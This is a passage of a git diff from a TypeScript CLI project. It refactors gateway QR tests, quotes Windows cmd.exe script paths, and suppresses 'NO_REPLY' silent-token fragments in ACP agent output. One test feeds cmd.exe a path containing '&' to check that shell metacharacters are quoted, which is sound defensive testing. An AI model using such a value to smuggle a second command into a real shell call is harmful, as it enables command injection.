+ auth?: string; + urlSource?: string; + }; + } + + function mockTailscaleStatusLookup() { + runCommandWithTimeout.mockResolvedValue({ + code: 0, + stdout: '{"Self":{"DNSName":"ts-host.tailnet.ts.net."}}', + stderr: "", + }); + } + beforeEach(() => { vi.clearAllMocks(); vi.stubEnv("OPENCLAW_GATEWAY_TOKEN", ""); @@ -157,21 +200,11 @@ describe("registerQrCli", () => { }); it("skips local password SecretRef resolution when --token override is provided", async () => { - loadConfig.mockReturnValue({ - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - bind: "custom", - customBindHost: "gateway.local", - auth: { - mode: "password", - password: { source: "env", provider: "default", id: "MISSING_LOCAL_GATEWAY_PASSWORD" }, - }, - }, - }); + loadConfig.mockReturnValue( + createLocalGatewayConfigWithAuth( + createLocalGatewayPasswordRefAuth("MISSING_LOCAL_GATEWAY_PASSWORD"), + ), + ); await runQr(["--setup-code-only", "--token", "override-token"]); @@ -184,21 +217,11 @@ describe("registerQrCli", () => { it("resolves local gateway auth password SecretRefs before setup code generation", async () => { vi.stubEnv("QR_LOCAL_GATEWAY_PASSWORD", "local-password-secret"); - loadConfig.mockReturnValue({ - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - bind: "custom", - customBindHost: "gateway.local", - auth: { - mode: "password", - password: { source: "env", provider: "default", id: "QR_LOCAL_GATEWAY_PASSWORD" }, - }, - }, - }); + loadConfig.mockReturnValue( + createLocalGatewayConfigWithAuth( + createLocalGatewayPasswordRefAuth("QR_LOCAL_GATEWAY_PASSWORD"), + ), + ); await runQr(["--setup-code-only"]); @@ -212,21 +235,11 @@ describe("registerQrCli", () => { it("uses OPENCLAW_GATEWAY_PASSWORD without resolving local password SecretRef", async () => { vi.stubEnv("OPENCLAW_GATEWAY_PASSWORD", "password-from-env"); - loadConfig.mockReturnValue({ - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - bind: "custom", - customBindHost: "gateway.local", - auth: { - mode: "password", - password: { source: "env", provider: "default", id: "MISSING_LOCAL_GATEWAY_PASSWORD" }, - }, - }, - }); + loadConfig.mockReturnValue( + createLocalGatewayConfigWithAuth( + createLocalGatewayPasswordRefAuth("MISSING_LOCAL_GATEWAY_PASSWORD"), + ), + ); await runQr(["--setup-code-only"]); @@ -239,22 +252,13 @@ describe("registerQrCli", () => { }); it("does not resolve local password SecretRef when auth mode is token", async () => { - loadConfig.mockReturnValue({ - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - bind: "custom", - customBindHost: "gateway.local", - auth: { - mode: "token", - token: "token-123", - password: { source: "env", provider: "default", id: "MISSING_LOCAL_GATEWAY_PASSWORD" }, - }, - }, - }); + loadConfig.mockReturnValue( + createLocalGatewayConfigWithAuth({ + mode: "token", + token: "token-123", + password: { source: "env", provider: "default", id: "MISSING_LOCAL_GATEWAY_PASSWORD" }, + }), + ); await runQr(["--setup-code-only"]); @@ -268,20 +272,11 @@ describe("registerQrCli", () => { it("resolves local password SecretRef when auth mode is inferred", async () => { vi.stubEnv("QR_INFERRED_GATEWAY_PASSWORD", "inferred-password"); - loadConfig.mockReturnValue({ - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - bind: "custom", - customBindHost: "gateway.local", - auth: { - password: { source: "env", provider: "default", id: "QR_INFERRED_GATEWAY_PASSWORD" }, - }, - }, - }); + loadConfig.mockReturnValue( + createLocalGatewayConfigWithAuth({ + password: { source: "env", provider: "default", id: "QR_INFERRED_GATEWAY_PASSWORD" }, + }), + ); await runQr(["--setup-code-only"]); @@ -390,20 +385,11 @@ describe("registerQrCli", () => { { name: "when tailscale is configured", withTailscale: true }, ])("reports gateway.remote.url as source in --remote json output ($name)", async (testCase) => { loadConfig.mockReturnValue(createRemoteQrConfig({ withTailscale: testCase.withTailscale })); - runCommandWithTimeout.mockResolvedValue({ - code: 0, - stdout: '{"Self":{"DNSName":"ts-host.tailnet.ts.net."}}', - stderr: "", - }); + mockTailscaleStatusLookup(); await runQr(["--json", "--remote"]); - const payload = JSON.parse(String(runtime.log.mock.calls.at(-1)?.[0] ?? "{}")) as { - setupCode?: string; - gatewayUrl?: string; - auth?: string; - urlSource?: string; - }; + const payload = parseLastLoggedQrJson(); expect(payload.gatewayUrl).toBe("wss://remote.example.com:444"); expect(payload.auth).toBe("token"); expect(payload.urlSource).toBe("gateway.remote.url"); @@ -416,20 +402,11 @@ describe("registerQrCli", () => { resolvedConfig: createRemoteQrConfig(), diagnostics: ["gateway.remote.password inactive"] as string[], }); - runCommandWithTimeout.mockResolvedValue({ - code: 0, - stdout: '{"Self":{"DNSName":"ts-host.tailnet.ts.net."}}', - stderr: "", - }); + mockTailscaleStatusLookup(); await runQr(["--json", "--remote"]); - const payload = JSON.parse(String(runtime.log.mock.calls.at(-1)?.[0] ?? "{}")) as { - setupCode?: string; - gatewayUrl?: string; - auth?: string; - urlSource?: string; - }; + const payload = parseLastLoggedQrJson(); expect(payload.gatewayUrl).toBe("wss://remote.example.com:444"); expect( runtime.error.mock.calls.some((call) => diff --git a/src/cli/update-cli/restart-helper.test.ts b/src/cli/update-cli/restart-helper.test.ts index 18888c27f53..1e15556d89e 100644 --- a/src/cli/update-cli/restart-helper.test.ts +++ b/src/cli/update-cli/restart-helper.test.ts @@ -298,11 +298,25 @@ describe("restart-helper", () => { await runRestartScript(scriptPath); - expect(spawn).toHaveBeenCalledWith("cmd.exe", ["/c", scriptPath], { + expect(spawn).toHaveBeenCalledWith("cmd.exe", ["/d", "/s", "/c", scriptPath], { detached: true, stdio: "ignore", }); expect(mockChild.unref).toHaveBeenCalled(); }); + + it("quotes cmd.exe /c paths with metacharacters on Windows", async () => { + Object.defineProperty(process, "platform", { value: "win32" }); + const scriptPath = "C:\\Temp\\me&(ow)\\fake-script.bat"; + const mockChild = { unref: vi.fn() }; + vi.mocked(spawn).mockReturnValue(mockChild as unknown as ChildProcess); + + await runRestartScript(scriptPath); + + expect(spawn).toHaveBeenCalledWith("cmd.exe", ["/d", "/s", "/c", `"${scriptPath}"`], { + detached: true, + stdio: "ignore", + }); + }); }); }); diff --git a/src/cli/update-cli/restart-helper.ts b/src/cli/update-cli/restart-helper.ts index 4f7d45aab0c..02ac29d03bb 100644 --- a/src/cli/update-cli/restart-helper.ts +++ b/src/cli/update-cli/restart-helper.ts @@ -3,6 +3,7 @@ import fs from "node:fs/promises"; import os from "node:os"; import path from "node:path"; import { DEFAULT_GATEWAY_PORT } from "../../config/paths.js"; +import { quoteCmdScriptArg } from "../../daemon/cmd-argv.js"; import { resolveGatewayLaunchAgentLabel, resolveGatewaySystemdServiceName, @@ -161,7 +162,7 @@ del "%~f0" export async function runRestartScript(scriptPath: string): Promise { const isWindows = process.platform === "win32"; const file = isWindows ? "cmd.exe" : "/bin/sh"; - const args = isWindows ? ["/c", scriptPath] : [scriptPath]; + const args = isWindows ? ["/d", "/s", "/c", quoteCmdScriptArg(scriptPath)] : [scriptPath]; const child = spawn(file, args, { detached: true, diff --git a/src/commands/agent.acp.test.ts b/src/commands/agent.acp.test.ts index cde0ab54a94..d5dd4b8b727 100644 --- a/src/commands/agent.acp.test.ts +++ b/src/commands/agent.acp.test.ts @@ -7,6 +7,7 @@ import { AcpRuntimeError } from "../acp/runtime/errors.js"; import * as embeddedModule from "../agents/pi-embedded.js"; import type { OpenClawConfig } from "../config/config.js"; import * as configModule from "../config/config.js"; +import { onAgentEvent } from "../infra/agent-events.js"; import type { RuntimeEnv } from "../runtime.js"; import { agentCommand } from "./agent.js"; @@ -195,6 +196,188 @@ describe("agentCommand ACP runtime routing", () => { }); }); + it("suppresses ACP NO_REPLY lead fragments before emitting assistant text", async () => { + await withTempHome(async (home) => { + const storePath = path.join(home, "sessions.json"); + writeAcpSessionStore(storePath); + mockConfig(home, storePath); + + const assistantEvents: Array<{ text?: string; delta?: string }> = []; + const stop = onAgentEvent((evt) => { + if (evt.stream !== "assistant") { + return; + } + assistantEvents.push({ + text: typeof evt.data?.text === "string" ? evt.data.text : undefined, + delta: typeof evt.data?.delta === "string" ? evt.data.delta : undefined, + }); + }); + + const runTurn = vi.fn(async (paramsUnknown: unknown) => { + const params = paramsUnknown as { + onEvent?: (event: { type: string; text?: string; stopReason?: string }) => Promise; + }; + for (const text of ["NO", "NO_", "NO_RE", "NO_REPLY", "Actual answer"]) { + await params.onEvent?.({ type: "text_delta", text }); + } + await params.onEvent?.({ type: "done", stopReason: "stop" }); + }); + + mockAcpManager({ + runTurn: (params: unknown) => runTurn(params), + }); + + try { + await agentCommand({ message: "ping", sessionKey: "agent:codex:acp:test" }, runtime); + } finally { + stop(); + } + + expect(assistantEvents).toEqual([{ text: "Actual answer", delta: "Actual answer" }]); + + const logLines = vi.mocked(runtime.log).mock.calls.map(([first]) => String(first)); + expect(logLines.some((line) => line.includes("NO_REPLY"))).toBe(false); + expect(logLines.some((line) => line.includes("Actual answer"))).toBe(true); + }); + }); + + it("keeps silent-only ACP turns out of assistant output", async () => { + await withTempHome(async (home) => { + const storePath = path.join(home, "sessions.json"); + writeAcpSessionStore(storePath); + mockConfig(home, storePath); + + const assistantEvents: string[] = []; + const stop = onAgentEvent((evt) => { + if (evt.stream !== "assistant") { + return; + } + if (typeof evt.data?.text === "string") { + assistantEvents.push(evt.data.text); + } + }); + + const runTurn = vi.fn(async (paramsUnknown: unknown) => { + const params = paramsUnknown as { + onEvent?: (event: { type: string; text?: string; stopReason?: string }) => Promise; + }; + for (const text of ["NO", "NO_", "NO_RE", "NO_REPLY"]) { + await params.onEvent?.({ type: "text_delta", text }); + } + await params.onEvent?.({ type: "done", stopReason: "stop" }); + }); + + mockAcpManager({ + runTurn: (params: unknown) => runTurn(params), + }); + + try { + await agentCommand({ message: "ping", sessionKey: "agent:codex:acp:test" }, runtime); + } finally { + stop(); + } + + expect(assistantEvents).toEqual([]); + + const logLines = vi.mocked(runtime.log).mock.calls.map(([first]) => String(first)); + expect(logLines.some((line) => line.includes("NO_REPLY"))).toBe(false); + expect(logLines.some((line) => line.includes("No reply from agent."))).toBe(true); + }); + }); + + it("preserves repeated identical ACP delta chunks", async () => { + await withTempHome(async (home) => { + const storePath = path.join(home, "sessions.json"); + writeAcpSessionStore(storePath); + mockConfig(home, storePath); + + const assistantEvents: Array<{ text?: string; delta?: string }> = []; + const stop = onAgentEvent((evt) => { + if (evt.stream !== "assistant") { + return; + } + assistantEvents.push({ + text: typeof evt.data?.text === "string" ? evt.data.text : undefined, + delta: typeof evt.data?.delta === "string" ? evt.data.delta : undefined, + }); + }); + + const runTurn = vi.fn(async (paramsUnknown: unknown) => { + const params = paramsUnknown as { + onEvent?: (event: { type: string; text?: string; stopReason?: string }) => Promise; + }; + for (const text of ["b", "o", "o", "k"]) { + await params.onEvent?.({ type: "text_delta", text }); + } + await params.onEvent?.({ type: "done", stopReason: "stop" }); + }); + + mockAcpManager({ + runTurn: (params: unknown) => runTurn(params), + }); + + try { + await agentCommand({ message: "ping", sessionKey: "agent:codex:acp:test" }, runtime); + } finally { + stop(); + } + + expect(assistantEvents).toEqual([ + { text: "b", delta: "b" }, + { text: "bo", delta: "o" }, + { text: "boo", delta: "o" }, + { text: "book", delta: "k" }, + ]); + + const logLines = vi.mocked(runtime.log).mock.calls.map(([first]) => String(first)); + expect(logLines.some((line) => line.includes("book"))).toBe(true); + }); + }); + + it("re-emits buffered NO prefix when ACP text becomes visible content", async () => { + await withTempHome(async (home) => { + const storePath = path.join(home, "sessions.json"); + writeAcpSessionStore(storePath); + mockConfig(home, storePath); + + const assistantEvents: Array<{ text?: string; delta?: string }> = []; + const stop = onAgentEvent((evt) => { + if (evt.stream !== "assistant") { + return; + } + assistantEvents.push({ + text: typeof evt.data?.text === "string" ? evt.data.text : undefined, + delta: typeof evt.data?.delta === "string" ? evt.data.delta : undefined, + }); + }); + + const runTurn = vi.fn(async (paramsUnknown: unknown) => { + const params = paramsUnknown as { + onEvent?: (event: { type: string; text?: string; stopReason?: string }) => Promise; + }; + for (const text of ["NO", "W"]) { + await params.onEvent?.({ type: "text_delta", text }); + } + await params.onEvent?.({ type: "done", stopReason: "stop" }); + }); + + mockAcpManager({ + runTurn: (params: unknown) => runTurn(params), + }); + + try { + await agentCommand({ message: "ping", sessionKey: "agent:codex:acp:test" }, runtime); + } finally { + stop(); + } + + expect(assistantEvents).toEqual([{ text: "NOW", delta: "NOW" }]); + + const logLines = vi.mocked(runtime.log).mock.calls.map(([first]) => String(first)); + expect(logLines.some((line) => line.includes("NOW"))).toBe(true); + }); + }); + it("fails closed for ACP-shaped session keys missing ACP metadata", async () => { await withTempHome(async (home) => { const storePath = path.join(home, "sessions.json"); diff --git a/src/commands/agent.ts b/src/commands/agent.ts index 215d249d964..10582521b95 100644 --- a/src/commands/agent.ts +++ b/src/commands/agent.ts @@ -38,6 +38,7 @@ import { buildWorkspaceSkillSnapshot } from "../agents/skills.js"; import { getSkillsSnapshotVersion } from "../agents/skills/refresh.js"; import { resolveAgentTimeoutMs } from "../agents/timeout.js"; import { ensureAgentWorkspace } from "../agents/workspace.js"; +import { normalizeReplyPayload } from "../auto-reply/reply/normalize-reply.js"; import { formatThinkingLevels, formatXHighModelHint, @@ -47,6 +48,11 @@ import { type ThinkLevel, type VerboseLevel, } from "../auto-reply/thinking.js"; +import { + isSilentReplyPrefixText, + isSilentReplyText, + SILENT_REPLY_TOKEN, +} from "../auto-reply/tokens.js"; import { formatCliCommand } from "../cli/command-format.js"; import { resolveCommandSecretRefsViaGateway } from "../cli/command-secret-gateway.js"; import { getAgentRuntimeCommandSecretTargetIds } from "../cli/command-secret-targets.js"; @@ -148,6 +154,80 @@ function prependInternalEventContext( return [renderedEvents, body].filter(Boolean).join("\n\n"); } +function createAcpVisibleTextAccumulator() { + let pendingSilentPrefix = ""; + let visibleText = ""; + const startsWithWordChar = (chunk: string): boolean => /^[\p{L}\p{N}]/u.test(chunk); + + const resolveNextCandidate = (base: string, chunk: string): string => { + if (!base) { + return chunk; + } + if ( + isSilentReplyText(base, SILENT_REPLY_TOKEN) && + !chunk.startsWith(base) && + startsWithWordChar(chunk) + ) { + return chunk; + } + // Some ACP backends emit cumulative snapshots even on text_delta-style hooks. + // Accept those only when they strictly extend the buffered text. + if (chunk.startsWith(base) && chunk.length > base.length) { + return chunk; + } + return `${base}${chunk}`; + }; + + const mergeVisibleChunk = (base: string, chunk: string): { text: string; delta: string } => { + if (!base) { + return { text: chunk, delta: chunk }; + } + if (chunk.startsWith(base) && chunk.length > base.length) { + const delta = chunk.slice(base.length); + return { text: chunk, delta }; + } + return { + text: `${base}${chunk}`, + delta: chunk, + }; + }; + + return { + consume(chunk: string): { text: string; delta: string } | null { + if (!chunk) { + return null; + } + + if (!visibleText) { + const leadCandidate = resolveNextCandidate(pendingSilentPrefix, chunk); + const trimmedLeadCandidate = leadCandidate.trim(); + if ( + isSilentReplyText(trimmedLeadCandidate, SILENT_REPLY_TOKEN) || + isSilentReplyPrefixText(trimmedLeadCandidate, SILENT_REPLY_TOKEN) + ) { + pendingSilentPrefix = leadCandidate; + return null; + } + if (pendingSilentPrefix) { + pendingSilentPrefix = ""; + visibleText = leadCandidate; + return { + text: visibleText, + delta: leadCandidate, + }; + } + } + + const nextVisible = mergeVisibleChunk(visibleText, chunk); + visibleText = nextVisible.text; + return nextVisible.delta ? nextVisible : null; + }, + finalize(): string { + return visibleText.trim(); + }, + }; +} + function runAgentAttempt(params: { providerOverride: string; modelOverride: string; @@ -174,7 +254,7 @@ function runAgentAttempt(params: { primaryProvider: string; sessionStore?: Record; storePath?: string; - allowRateLimitCooldownProbe?: boolean; + allowTransientCooldownProbe?: boolean; }) { const effectivePrompt = resolveFallbackRetryPrompt({ body: params.body, @@ -325,7 +405,7 @@ function runAgentAttempt(params: { inputProvenance: params.opts.inputProvenance, streamParams: params.opts.streamParams, agentDir: params.agentDir, - allowRateLimitCooldownProbe: params.allowRateLimitCooldownProbe, + allowTransientCooldownProbe: params.allowTransientCooldownProbe, onAgentEvent: params.onAgentEvent, bootstrapPromptWarningSignaturesSeen, bootstrapPromptWarningSignature, @@ -492,7 +572,7 @@ async function agentCommandInternal( }, }); - let streamedText = ""; + const visibleTextAccumulator = createAcpVisibleTextAccumulator(); let stopReason: string | undefined; try { const dispatchPolicyError = resolveAcpDispatchPolicyError(cfg); @@ -528,13 +608,16 @@ async function agentCommandInternal( if (!event.text) { return; } - streamedText += event.text; + const visibleUpdate = visibleTextAccumulator.consume(event.text); + if (!visibleUpdate) { + return; + } emitAgentEvent({ runId, stream: "assistant", data: { - text: streamedText, - delta: event.text, + text: visibleUpdate.text, + delta: visibleUpdate.delta, }, }); }, @@ -566,14 +649,10 @@ async function agentCommandInternal( }, }); - const finalText = streamedText.trim(); - const payloads = finalText - ? [ - { - text: finalText, - }, - ] - : []; + const normalizedFinalPayload = normalizeReplyPayload({ + text: visibleTextAccumulator.finalize(), + }); + const payloads = normalizedFinalPayload ? [normalizedFinalPayload] : []; const result = { payloads, meta: { @@ -868,7 +947,7 @@ async function agentCommandInternal( primaryProvider: provider, sessionStore, storePath, - allowRateLimitCooldownProbe: runOptions?.allowRateLimitCooldownProbe, + allowTransientCooldownProbe: runOptions?.allowTransientCooldownProbe, onAgentEvent: (evt) => { // Track lifecycle end for fallback emission below. if ( diff --git a/src/commands/agent/session.ts b/src/commands/agent/session.ts index 62600448af4..f3ef076d654 100644 --- a/src/commands/agent/session.ts +++ b/src/commands/agent/session.ts @@ -1,5 +1,6 @@ import crypto from "node:crypto"; import { listAgentIds } from "../../agents/agent-scope.js"; +import { clearBootstrapSnapshotOnSessionRollover } from "../../agents/bootstrap-cache.js"; import type { MsgContext } from "../../auto-reply/templating.js"; import { normalizeThinkLevel, @@ -144,6 +145,11 @@ export function resolveSession(opts: { opts.sessionId?.trim() || (fresh ? sessionEntry?.sessionId : undefined) || crypto.randomUUID(); const isNewSession = !fresh && !opts.sessionId; + clearBootstrapSnapshotOnSessionRollover({ + sessionKey, + previousSessionId: isNewSession ? sessionEntry?.sessionId : undefined, + }); + const persistedThinking = fresh && sessionEntry?.thinkingLevel ? normalizeThinkLevel(sessionEntry.thinkingLevel) diff --git a/src/commands/auth-choice.apply-helpers.ts b/src/commands/auth-choice.apply-helpers.ts index f753aa557bf..122be392153 100644 --- a/src/commands/auth-choice.apply-helpers.ts +++ b/src/commands/auth-choice.apply-helpers.ts @@ -20,7 +20,7 @@ import type { SecretInputMode } from "./onboard-types.js"; const ENV_SOURCE_LABEL_RE = /(?:^|:\s)([A-Z][A-Z0-9_]*)$/; -type SecretRefChoice = "env" | "provider"; +type SecretRefChoice = "env" | "provider"; // pragma: allowlist secret export type SecretInputModePromptCopy = { modeMessage?: string; @@ -101,7 +101,7 @@ export async function promptSecretRefForOnboarding(params: { const defaultEnvVar = params.preferredEnvVar ?? resolveDefaultProviderEnvVar(params.provider) ?? ""; const defaultFilePointer = resolveDefaultFilePointerId(params.provider); - let sourceChoice: SecretRefChoice = "env"; + let sourceChoice: SecretRefChoice = "env"; // pragma: allowlist secret while (true) { const sourceRaw: SecretRefChoice = await params.prompter.select({ diff --git a/src/commands/models/list.probe.test.ts b/src/commands/models/list.probe.test.ts index 55c5ef064f3..70ffde1dd65 100644 --- a/src/commands/models/list.probe.test.ts +++ b/src/commands/models/list.probe.test.ts @@ -9,6 +9,7 @@ describe("mapFailoverReasonToProbeStatus", () => { it("keeps existing failover reason mappings", () => { expect(mapFailoverReasonToProbeStatus("auth")).toBe("auth"); expect(mapFailoverReasonToProbeStatus("rate_limit")).toBe("rate_limit"); + expect(mapFailoverReasonToProbeStatus("overloaded")).toBe("rate_limit"); expect(mapFailoverReasonToProbeStatus("billing")).toBe("billing"); expect(mapFailoverReasonToProbeStatus("timeout")).toBe("timeout"); expect(mapFailoverReasonToProbeStatus("format")).toBe("format"); diff --git a/src/commands/models/list.probe.ts b/src/commands/models/list.probe.ts index 433c005077d..8a2ec87adcc 100644 --- a/src/commands/models/list.probe.ts +++ b/src/commands/models/list.probe.ts @@ -106,7 +106,7 @@ export function mapFailoverReasonToProbeStatus(reason?: string | null): AuthProb // surface in the auth bucket instead of showing as unknown. return "auth"; } - if (reason === "rate_limit") { + if (reason === "rate_limit" || reason === "overloaded") { return "rate_limit"; } if (reason === "billing") { diff --git a/src/commands/models/list.status.test.ts b/src/commands/models/list.status.test.ts index a2563b09f08..7a792ac042d 100644 --- a/src/commands/models/list.status.test.ts +++ b/src/commands/models/list.status.test.ts @@ -9,14 +9,14 @@ const mocks = vi.hoisted(() => { type: "oauth", provider: "anthropic", access: "sk-ant-oat01-ACCESS-TOKEN-1234567890", - refresh: "sk-ant-ort01-REFRESH-TOKEN-1234567890", + refresh: "sk-ant-ort01-REFRESH-TOKEN-1234567890", // pragma: allowlist secret expires: Date.now() + 60_000, email: "peter@example.com", }, "anthropic:work": { type: "api_key", provider: "anthropic", - key: "sk-ant-api-0123456789abcdefghijklmnopqrstuvwxyz", + key: "sk-ant-api-0123456789abcdefghijklmnopqrstuvwxyz", // pragma: allowlist secret }, "openai-codex:default": { type: "oauth", @@ -49,13 +49,13 @@ const mocks = vi.hoisted(() => { resolveEnvApiKey: vi.fn((provider: string) => { if (provider === "openai") { return { - apiKey: "sk-openai-0123456789abcdefghijklmnopqrstuvwxyz", + apiKey: "sk-openai-0123456789abcdefghijklmnopqrstuvwxyz", // pragma: allowlist secret source: "shell env: OPENAI_API_KEY", }; } if (provider === "anthropic") { return { - apiKey: "sk-ant-oat01-ACCESS-TOKEN-1234567890", + apiKey: "sk-ant-oat01-ACCESS-TOKEN-1234567890", // pragma: allowlist secret source: "env: ANTHROPIC_OAUTH_TOKEN", }; } @@ -231,7 +231,7 @@ describe("modelsStatusCommand auth overview", () => { it("does not emit raw short api-key values in JSON labels", async () => { const localRuntime = createRuntime(); - const shortSecret = "abc123"; + const shortSecret = "abc123"; // pragma: allowlist secret const originalProfiles = { ...mocks.store.profiles }; mocks.store.profiles = { ...mocks.store.profiles, diff --git a/src/commands/onboard-auth.config-core.ts b/src/commands/onboard-auth.config-core.ts index 18d106c7d7f..103343d5914 100644 --- a/src/commands/onboard-auth.config-core.ts +++ b/src/commands/onboard-auth.config-core.ts @@ -305,7 +305,7 @@ export function applyVeniceProviderConfig(cfg: OpenClawConfig): OpenClawConfig { const models = { ...cfg.agents?.defaults?.models }; models[VENICE_DEFAULT_MODEL_REF] = { ...models[VENICE_DEFAULT_MODEL_REF], - alias: models[VENICE_DEFAULT_MODEL_REF]?.alias ?? "Llama 3.3 70B", + alias: models[VENICE_DEFAULT_MODEL_REF]?.alias ?? "Kimi K2.5", }; const veniceModels = VENICE_MODEL_CATALOG.map(buildVeniceModelDefinition); diff --git a/src/commands/onboard-auth.credentials.ts b/src/commands/onboard-auth.credentials.ts index 2cf9c25b689..c32a3ea9ae6 100644 --- a/src/commands/onboard-auth.credentials.ts +++ b/src/commands/onboard-auth.credentials.ts @@ -63,7 +63,8 @@ function resolveApiKeySecretInput( if (inlineEnvRef) { return inlineEnvRef; } - if (options?.secretInputMode === "ref") { + const useSecretRefMode = options?.secretInputMode === "ref"; // pragma: allowlist secret + if (useSecretRefMode) { return resolveProviderDefaultEnvSecretRef(provider); } return normalized; diff --git a/src/commands/onboard-custom.test.ts b/src/commands/onboard-custom.test.ts index 374f188dc62..b04f7bc08ab 100644 --- a/src/commands/onboard-custom.test.ts +++ b/src/commands/onboard-custom.test.ts @@ -429,7 +429,7 @@ describe("parseNonInteractiveCustomApiFlags", () => { baseUrl: "https://llm.example.com/v1", modelId: "foo-large", compatibility: "openai", - apiKey: "custom-test-key", + apiKey: "custom-test-key", // pragma: allowlist secret providerId: "my-custom", }); }); diff --git a/src/commands/onboard-non-interactive.provider-auth.test.ts b/src/commands/onboard-non-interactive.provider-auth.test.ts index 077b2c6d672..390d19b0154 100644 --- a/src/commands/onboard-non-interactive.provider-auth.test.ts +++ b/src/commands/onboard-non-interactive.provider-auth.test.ts @@ -184,7 +184,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-minimax-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "minimax-api", - minimaxApiKey: "sk-minimax-test", + minimaxApiKey: "sk-minimax-test", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["minimax:default"]?.provider).toBe("minimax"); @@ -203,7 +203,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-minimax-cn-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "minimax-api-key-cn", - minimaxApiKey: "sk-minimax-test", + minimaxApiKey: "sk-minimax-test", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["minimax-cn:default"]?.provider).toBe("minimax-cn"); @@ -222,7 +222,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-zai-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "zai-api-key", - zaiApiKey: "zai-test-key", + zaiApiKey: "zai-test-key", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["zai:default"]?.provider).toBe("zai"); @@ -237,7 +237,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-zai-cn-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "zai-coding-cn", - zaiApiKey: "zai-test-key", + zaiApiKey: "zai-test-key", // pragma: allowlist secret }); expect(cfg.models?.providers?.zai?.baseUrl).toBe( @@ -264,7 +264,7 @@ describe("onboard (non-interactive): provider auth", () => { it("infers Mistral auth choice from --mistral-api-key and sets default model", async () => { await withOnboardEnv("openclaw-onboard-mistral-infer-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { - mistralApiKey: "mistral-test-key", + mistralApiKey: "mistral-test-key", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["mistral:default"]?.provider).toBe("mistral"); @@ -282,7 +282,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-volcengine-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "volcengine-api-key", - volcengineApiKey: "volcengine-test-key", + volcengineApiKey: "volcengine-test-key", // pragma: allowlist secret }); expect(cfg.agents?.defaults?.model?.primary).toBe("volcengine-plan/ark-code-latest"); @@ -292,7 +292,7 @@ describe("onboard (non-interactive): provider auth", () => { it("infers BytePlus auth choice from --byteplus-api-key and sets default model", async () => { await withOnboardEnv("openclaw-onboard-byteplus-infer-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { - byteplusApiKey: "byteplus-test-key", + byteplusApiKey: "byteplus-test-key", // pragma: allowlist secret }); expect(cfg.agents?.defaults?.model?.primary).toBe("byteplus-plan/ark-code-latest"); @@ -303,7 +303,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-ai-gateway-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "ai-gateway-api-key", - aiGatewayApiKey: "gateway-test-key", + aiGatewayApiKey: "gateway-test-key", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["vercel-ai-gateway:default"]?.provider).toBe("vercel-ai-gateway"); @@ -350,7 +350,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-openai-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "openai-api-key", - openaiApiKey: "sk-openai-test", + openaiApiKey: "sk-openai-test", // pragma: allowlist secret }); expect(cfg.agents?.defaults?.model?.primary).toBe(OPENAI_DEFAULT_MODEL); @@ -410,10 +410,10 @@ describe("onboard (non-interactive): provider auth", () => { "fails fast for $name when --secret-input-mode ref uses explicit key without env and does not leak the key", async ({ prefix, authChoice, optionKey, flagName, envVar }) => { await withOnboardEnv(prefix, async ({ runtime }) => { - const providedSecret = `${envVar.toLowerCase()}-should-not-leak`; + const providedSecret = `${envVar.toLowerCase()}-should-not-leak`; // pragma: allowlist secret const options: Record = { authChoice, - secretInputMode: "ref", + secretInputMode: "ref", // pragma: allowlist secret [optionKey]: providedSecret, skipSkills: true, }; @@ -447,12 +447,12 @@ describe("onboard (non-interactive): provider auth", () => { await withEnvAsync( { OPENCODE_API_KEY: undefined, - OPENCODE_ZEN_API_KEY: "opencode-zen-env-key", + OPENCODE_ZEN_API_KEY: "opencode-zen-env-key", // pragma: allowlist secret }, async () => { await runNonInteractiveOnboardingWithDefaults(runtime, { authChoice: "opencode-zen", - secretInputMode: "ref", + secretInputMode: "ref", // pragma: allowlist secret skipSkills: true, }); @@ -487,7 +487,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv("openclaw-onboard-litellm-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { authChoice: "litellm-api-key", - litellmApiKey: "litellm-test-key", + litellmApiKey: "litellm-test-key", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["litellm:default"]?.provider).toBe("litellm"); @@ -519,7 +519,7 @@ describe("onboard (non-interactive): provider auth", () => { await runNonInteractiveOnboardingWithDefaults(runtime, { cloudflareAiGatewayAccountId: "cf-account-id", cloudflareAiGatewayGatewayId: "cf-gateway-id", - cloudflareAiGatewayApiKey: "cf-gateway-test-key", + cloudflareAiGatewayApiKey: "cf-gateway-test-key", // pragma: allowlist secret skipSkills: true, ...options, }); @@ -543,7 +543,7 @@ describe("onboard (non-interactive): provider auth", () => { it("infers Together auth choice from --together-api-key and sets default model", async () => { await withOnboardEnv("openclaw-onboard-together-infer-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { - togetherApiKey: "together-test-key", + togetherApiKey: "together-test-key", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["together:default"]?.provider).toBe("together"); @@ -560,7 +560,7 